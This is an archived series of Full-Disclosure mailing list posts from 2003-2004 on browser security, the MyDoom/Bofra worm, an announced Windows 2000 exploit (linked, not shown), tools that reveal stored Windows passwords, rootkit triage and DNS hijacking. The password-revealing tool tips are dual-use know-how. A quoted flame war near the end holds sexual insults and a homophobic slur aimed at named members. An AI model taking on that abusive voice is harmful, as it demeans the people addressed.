Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Tue, 16 Nov 2004 09:07:56 -0600, Todd Towles [EMAIL PROTECTED] wrote: Darwin and BSD...Darwin is the open source kernel that OS X uses...=) What does this have to do with IE and Firefox, again? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Tue, 16 Nov 2004 10:33:26 -0600, Todd Towles [EMAIL PROTECTED] wrote: It doesn'tI was responding to another off-topic message. But they again, how many messages on FD same on topic for more than 10 messages. =) Fair enough Who do you think posted the original IE is just as safe as FireFox message? ;) I am too lazy to. So what did you message add to the subject? Other than telling me it was OT..which is given. Hopefully an end or a start of a new thread. :) This will be my last OT post on this subject. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Tue, 16 Nov 2004 16:58:46 +, n3td3v [EMAIL PROTECTED] wrote: The site which was hosting services, like bombs, fake ID and other terrorist stuff is now showing a defacement or replacement page showing words from the intelligence services. http://www.shadowcrew.com Is this fake or real? Who knows.. The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 20:27:52 -0500, Scott Leff [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004 19:18:55 -0500, Danny [EMAIL PROTECTED] wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ...D This is applicable here: http://www.io.com/~cwagner/spyware/appendix.html Although it deals with malware/spyware, it highlights the major problem with IE that other 3rd party browsers do not have and will never have; namely, its marriage to the OS. Fair enough. The other problem is Microsoft's focus is on features first, then maybe a wee bit of security way down the list. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 12 Nov 2004 01:50:45 -0500, David B Harris [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004 19:18:55 -0500 Danny [EMAIL PROTECTED] wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ... because as soon as you hit 50% marketshare, the quality of the code which has been written and distributed instantaneously and magically drops and order of magnitude ... /sarcasm It's a simple concept. The more people use something, the more flaws are exposed. Especially if there ARE more flaws, lol. IE is doomed because of its integration with Microsoft software and its feature set. (See my last post for more info). ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 21:22:26 -0600, Frank Knobbe [EMAIL PROTECTED] wrote: On Thu, 2004-11-11 at 18:18, Danny wrote: However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? Wrong question. It's part of the equation. May not be the biggest part, but it is a factor. Based on everyones feedback, I would say the following kills IE's security: 1) Features 2) Features 3) ActiveX / Active Scripting 4) It's marriage with the OS 5) It's market share 6) It's marriage with so many other MS applications Yes, from a security point of view, this is very bad. Fundamentally, Microsoft is in trouble with IE and security. Who the hell would be able to secure a web browser with so much integration and features? The only hope in hell anyone would have securing IE, is by removing the list crap list above. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 12 Nov 2004 22:15:31 +0100, nicolas vigier [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004, Danny wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. Yes, IIS security needs work. Yes, Apache is a great web server. A properly setup IIS 6.0 server is no less secure than a properly setup Apache server (with the latest patches). Show me how/where a properly setup IIS 6.0 server needs security work? If you can't hack it, find someone who can or has, and show me evidence that it was setup properly. When I say properly, I mean, based on the recommendations stated on Microsoft's website for securing IIS 6.0. Likewise for setting up Apache. However, if Apache or any other web server had the same market share as IIS, would it really be that much more secure ? There sure would be a lot more people trying to find holes in Apache if it had the same user base. I didn't ask for a comparison for web SERVERS. We are talking about clients; we are talking about Internet Exploiter and any other web browser with more than 1000 users, say for example Firefox. Wooops. Netcraft tells us that 67% webservers are running Apache while 21% running IIS. Why are there so much worms targeting IIS and not so much for Apache ? 1) Because Microsoft did not have any useful security in-mind when they put out IIS 4 5. IIS 6 is a much different story; http://secunia.com/product/1438/ 2) I would say over 3/4 of them were not setup properly. You know, if you want your Microsoft product on the Internet, you do, unfortunately, have to set it up properly. However, it's actually not a lot of work. The problem is, most people don't do the work. They just plug it into the network and say Alright, we gots our fackin' websiiite up dare boys. Cletus, upload that fantiastic websiite with you shaggin' your mom's sisters goat that you made dare in FrontPage. Rght on little buddy! Shes alive! 3) Most MS admins are lazy and know very little about security. It's catch 23... why bother securing a product that does not have security built-in. The truth is that some programs have a bad design for security while some others have a better one. I agree. Microsoft is obviously the worst for this. See my last few posts. Believe it or not, I prefer Firefox over IE, Apache over IIS, FreeBSD over Windows, etc. The difference is, I have an open mind and try to keep all aspects of the debate in mind. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and mangement product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_ 3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New MyDoom exploiting IFRAME
On Wed, 10 Nov 2004 00:45:12 +1300, Nick FitzGerald [EMAIL PROTECTED] wrote: Berend-Jan Wever wrote: There's a new MyDoom variant exploiting the IFRAME issue ... In fact, it seems there's a reasonable chance many (most?) AV vendors will actually (re-)name this Bofra as it is sufficiently different from Mydoom as to seem worthy of a new family name. There are three known variants already. Note todays entry here: http://www.f-secure.com/weblog/ ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] How to clear contents of protected storage - Windows 2000
On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote: Dear Danny, You can use Cain Abel (http://www.oxid.it). Hi 3APA3A, Thank you for the tip. For this particular job, it does not display all of the entries listed from pstoreview.exe, specifically the INETCOMM Server passwords. Anything else I can try? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] How to clear contents of protected storage - Windows 2000
On Wed, 3 Nov 2004 09:56:31 -0500, Danny [EMAIL PROTECTED] wrote: On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote: Dear Danny, You can use Cain Abel (http://www.oxid.it). Hi 3APA3A, Thank you for the tip. For this particular job, it does not display all of the entries listed from pstoreview.exe, specifically the INETCOMM Server passwords. Anything else I can try? I found passview from nirsoft. Works. Case closed. ..D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] How to clear contents of protected storage - Windows 2000
After running: http://ntsecurity.nu/toolbox/pstoreview/ ...there are a bunch of INETCOMM Server passwords I want to clear out. Any idea on how to complete this? Thank you, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101
On Fri, 22 Oct 2004 13:20:36 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Posted here: http://dfind.kd-team.com/36/55/op.php Stack based overflow, bug discovered by Luigi Auriemma aluigi.altervista.org Tested working on Win2K, This public version crash on any WinXP, read the code why. The exploit bind a shellcode on the victim port 101. What does Microsoft say in response? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68
On Fri Oct 22 22:28:50 2004, Farrukh Hussain [EMAIL PROTECTED] wrote: Hi, Today I got e-mail from 69.197.83.68 CANADA ISP You mean a Canadian ISP? which has undetectable virus. By all anti-virus vendors? Well I downloaded this file but I didn't run it because I know it is virus. If you say it was not detected as a virus, how do you know it is a virus? and now I am complaining to rogers.com ISP about this matter. Because I got this file from this ISP. It is abuse of internet service. Welcome to the Internet. Unprotected computers are connected to ISP's across the globe. We receive hundreds of viruses from computers connected to ISP's every week. If you gave their abuse department the full email headers of this email you received from 69.197.83.68, then they will investigate and deal with the matter. However, no ISP, can force all of their users to run a personal firewall, up-to-date AV, and install the latest OS patches -- although they can encourage it and educate users on these subjects - which Rogers does do. I wish you well, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Senior M$ member says stop using passwords completely!
On Thu, 21 Oct 2004 23:52:18 +0300, Georgi Guninski [EMAIL PROTECTED] wrote: due to Tiny-delicate windows implementation, current windows passwords don't seem long enough (a m$ guy confirmed it). i recommend windows passwords to be enlarged by 3 to 5 inches. 100% guaranteed! (if permitted by the EULA) Password girth or length? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Senior M$ member says stop using passwords completely!
On Wed, 20 Oct 2004 17:01:56 +0300, Georgi Guninski [EMAIL PROTECTED] wrote: the poor m$ guy updated his blog. looks like he uses Excel(tm) for solving crypto problems. [...] Georgi, passwords vs. passphrases, which do you recommend? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] interesting trojan found
On Wed, 20 Oct 2004 17:51:26 +0100, Richard Stevens [EMAIL PROTECTED] wrote: b: anyone know a free boot disk that both reads writes to NTFS, so I can delete it! If you have a CD-ROM, http://www.nu2.nu/pebuilder/. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Security Bulletin Summary for October, 2004
On Tue, 12 Oct 2004 14:43:44 -0400, d31337 [EMAIL PROTECTED] wrote: Interesting that XP SP2 doesn't seem to be impacted by any of these vulnerabilities. Kinda gives you the impression MS knew about these for some time... http://www.microsoft.com/technet/security/bulletin/ms04-oct.mspx Not according the security bulletins I read: http://www.microsoft.com/technet/security/bulletin/MS04-038.mspx Affected Software: Microsoft Windows NT Server 4.0 Service Pack 6a Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP, Microsoft Windows XP Service Pack 1, and Microsoft Windows XP Service Pack 2 ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Security Bulletin Summary for October, 2004
On Tue, 12 Oct 2004 19:27:42 -0400, d31337 [EMAIL PROTECTED] wrote: I should have been more specific to eliminate confusion for those who consider IE part of the OS. Revised comment: Interesting that XP SP2 doesn't seem to be impacted by any of the *Windows* (not IE) vulnerabilities... I see your point, however, I would say IE is more a part of Windows than any other component. Now, back to your theme, yes, I also agree that Windows XP SP2 was less affected by these vulns than any other version of Windows. I would like to tell Microsoft, this is the way it *should* be! ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] mydoom.exe decyphering?
layman Sophos says: (sync-1.01; andy; I'm just doing my job, nothing personal, sorry) OK, this can readily be deducted somewhat from the mydoom.exe but not entirely. Ironically aladdin systems can find itself back in the worm's 'strings' output... a part of it is compressed with stuffit. [download MyDoomB, cut out the StuffIt part, unstuff it and cut out the (3rd/last) data part (use tail or so). Then hexdump -C that one again] Here's the part with the text (use fixed font in your mail client): HEX ff 87 22 92 00 0a 0a 28 73 79 6e 63 2d 31 2e fd ASCII * * 32 * 0 10 10 40 115 121 110 99 45 49 46 * SYMBOL * * * * * * ( s y n c - 1 . * HEX ff 6f ff 30 31 3b 20 61 6e 64 79 5 49 27 6d 20 ASCII * 111 * 48 49 59 32 97 110 100 121 5 73 39 109 32 SYMBOL * o * 0 1 ; a n d y * I ' m HEX 6a 75 73 74 20 64 6f 69 6e 67 20 6d 79 6b ff ef ASCII 106 117 115 116 32 100 111 105 110 103 32 109 121 107 * * SYMBOL j u s t d o i n g m y k * * HEX bf 0d 6f 62 2c 20 6e 6f 74 68 0f 70 65 72 73 6f ASCII * 13 111 98 44 32 110 111 116 104 15 112 101 114 115 111 SYMBOL * * o b , n o t h * p e r s o HEX 6e 61 6c 11 06 a6 fb ae 7d 72 72 79 29 42 47 40 ASCII 110 97 108 17 6 * * * 125 114 114 121 41 66 71 64 SYMBOL n a l * * * * * } r r y ) B G @ So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry) A few observations: - 'noth*' seems to get its 'ing ' part from the token 'doing ' - likewise ' just' must be the inspiration for ' job' replacing the ' j' with 'k' where * are non ascii. Note that ' just' fits into '' and j=k-1 - '*}rry' should translate to ' sorry' or (sophos) ', sorry' - is it sync-1.01 or perhaps sync-1.1.p01 or so, anyone has any idea what this sync is anyway - if BG@ at the end could in some way end up being 'BEGIN' we have an uuencoded remainder which would have to be 'decrypted' first. - how did sophos fill in the blanks, or did they One would think the entire data chunk would be encrypted or encoded or whatever you want to call it in the same manner (something like uuenc/decode can be used to have binary data be changed and obfuscated as text and restored to binary through a 1 on 1 (de)obfuscation, right?). Any thoughts? Is this a known algorithm that I'm not aware of for unicode compressing or something alike? How do other people investigate a binary? (I look at hexdumps, strings, output of 'file', magic numbers/strings...) Let me dare say something I'm going to regret (heck this list is full of flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this whole thing might be staged. It's so suggestive. But I lack the skill to look further and don't passionately care enough either. Yet, this is one interesting thing with the whole MS and SCO background. Please note, I use FreeBSD exclusively, not Windows, but was bored and got interested, and I'm wondering if anyone has done any research or experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not familiar with Windows code other than looking at some worm and noticing that it has smtp code or so. The things with archives within executables holding executables and even with a Mac archiving package being used, uhhmm I'll pass on that and just assume that that's all normal and doable out there over the fence :) /layman Hope you don't blame me for trying to have some interesting discussion. No matter what your skill level, it sure beats the ever present pissing contents. Regards, --Dan (normally lurker with habitual attraction to DEL key) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Mystery DNS Changes
On Wednesday 01 October 2003 21:19, Hansen, Kevin wrote: We have seen multiple instances where DHCP enabled workstations have had their DNS reconfigured to point to two of the three addresses listed below. Can anyone else confirm this? Incidents.org is reporting an increase in port 53 traffic over the last two days. Are we looking at the precursor to the next worm? 216.127.92.38 69.57.146.14 69.57.147.175 -KJH How bout asking [EMAIL PROTECTED] You likely have some spy/ad/pay ware on client machines. See lop.com and others. There's crap traffic on port 53 all the time, I get speedera ping-like traffic on my port 53 several times a day. It's a verifiable swarm but no one at att, verio, uunet, whatever seem to care. My cable ISP told me I could start legal action. Yeah right. This is probably a common occurance. I think you're mixing up two different issues here. Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Strange behavior in Windows 98 and 2000
2000 and XP boxes lose TCP/IP communication and, after a reboot, they work again. Win XP tries to push itself as being the authoritative server of its own host name by attempting to transfer its zone to the (local) dns server, doesn't it? Erratic behaviour is always a good way to break the thing. I rarely use WinXP, but did note that it behaves like that. Dunno about W2k. HTH Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Rootkit
On Saturday 27 September 2003 00:26, David Hane wrote: I already run my own database of MD5 checksums on all system files. That's how I know what files were effected. What I would like is maybe a listing of the files installed and what directories they went into for the various rootkits. Guess it's too late, but try something like integrit next time. Still timestamp should help. Obviously the names of the files that were installed are meaningless. So all I would have to work with would maybe be files sizes, signature text in the files (as you mentioned), and the directories into which they were installed. Unless someone can suggest something else. Like maybe a MD5 database of known hacked programs. Timestamp. You must be able to get the time at which things occured. If it might have been messed with look at inode numbers as well. An MD5 database of hacked programs would be like a hash db on existing insect species where about one quarter of them are known and mutations abund. Actually that's not a bad idea, in theory. How feasible would a searchable database of the most common hacked files be? For instance if a hacked version of ps is routinely installed by several rootkits could we then search that database and compare the MD5 signatures to list other files routinely used in conjunction with that app? I know it would be far from accurate but could it be useful? Bad idea. Exploits will easily vary. It's like anti virus databases, always too late anyway. Worry about what's on your plate now first. I also think that if you think you have various rootkits you should backup everything (the evidence) and reinstall the whole lot. Then look at the evidence. Compare it against older backups. Something will pop up. Also strings and hexdump are helpful. HTH, just IMHO Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re:
Are there list mods here? I'm almost scared to ask based on what i've been reading here lately. On Friday, July 18, 2003, at 06:15 PM, Anthony Aykut wrote: How come this list filters/stops/bans profanity, but fails to squeeze out puss like you?? Just goes to show what a fucking joke this list is, doesn't it?? - Original Message - LOL From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] Subject: RE: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:49:07 - I am guessing yuo can't even suck my dad's dick you fucking limp retard cunt. If think you can treat everybody like your favourite bitch you arrogant fuck, you did hit send on your mail to the wrong person. You l33t? Don't make me laugh, ass-boy. The only person tripping is, you. I cream my pants every fucking day reading this list, which is turned now into a retard circus due to lame-ass, would be funny, know-it-all mother fuckers like you. Donnie Wiener, the stupid kiddie-fucker wont even reveal his real name. Shame on you - cannot even converse without making personal attacks. Do I take it too personal? Fuck yeah. The moment you put my name on this mail, you crossed the line you cunt. I probably get banned from this list now for writing this email, but who gives a flying fuck - this list is ruined anyways. By fucks like you. Bye FD. By Weiner, the ass-rammed, gay-boy. Go and run back to your mommy, she'll suck your dick any day. - Original Message - i ll change yar mom panties bettar :D is yuo who say to excuse morning_wood i must demand yuo for have such bad guilt trip From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] CC: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:33:18 - Yawn, change the record. - Original Message - shutup yar dum. Christ almighty. For all your bikkering, wit and inventiveness, if you people put the same energy and will into educating people or arguing in a civil manner over what you are not agreeing to, this list would be a much better place. Wood at least tries, even though some of you may or may not agree to what or how he is doing it. But no, of course you won't do that, you'll have to show off and be arrogant - because lets face it we just love oneupmanship and love to mock people. That way we can REALLY show them that we are better. Sad. _ Protect your PC - get McAfee.com VirusScan Online http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 _ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters)
So, customer demand, security and most-effective-software-to-do-the-job aside...I wonder what kind of deal Microsoft cut with the Government? I wonder who, if anyone, got bumped out? Anyone else catch the story on /. Yesterday about the Munich deal? http://slashdot.org/article.pl?sid=03/07/15/1854215 Danny -Original Message- From: northern snowfall [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 16, 2003 3:50 PM To: Brad Bemis Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters) You are absolutely right! I will not argue this point at all. The only thing I will say is that product security is based on a process of evolution. My statement was intended to indicate that it is customer demand that drives the speed of that evolution. No. Customer demand should play the *least* part in security evolution. The *main* thing that security analysts and security developers should focus on are the capabilities of the opposition, whomever they may be. Your foe is not your customer, and if he is he will not lead you toward pleasant waters. Again, your thinking is dangerous. Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html